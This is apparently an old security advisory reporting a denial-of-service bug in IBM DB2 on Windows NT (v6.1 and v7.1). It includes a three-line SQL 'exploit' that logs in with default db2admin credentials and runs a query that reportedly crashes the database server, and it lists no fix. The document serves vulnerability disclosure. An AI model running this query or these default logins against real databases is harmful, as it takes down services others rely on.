COMMAND

    DB2 SQL

SYSTEMS AFFECTED

    IBM DB2 SQL for WinNT(v6.1), DB2 NT V7.1

PROBLEM

    Ben  Jurry  found  following.   The  DB2 Universal Database builds
    upon the  stability and  performance of  DB2 on  the mainframe and
    provides the features required in a distributed database  product.
    DB2 Universal Database (UDB)  is IBM's relational database  server
    solution  for  the  UNIX,  OS/2  and  Windows  NT/2000   operating
    environments.And More than 70% of the world's major companies rely
    on DB2 to manage their mission-critical business applications.

    There is  a bug  when you  excute a  special sql  include time and
    varchar ,which will make the database crash.

    Exploit:

        connect reset;
        connect to sample user db2admin using db2admin;
        select * from employee where year(birthdate)=1999 and firstnme<'';

    These sql will make the database crash.

SOLUTION

    Nothing yet.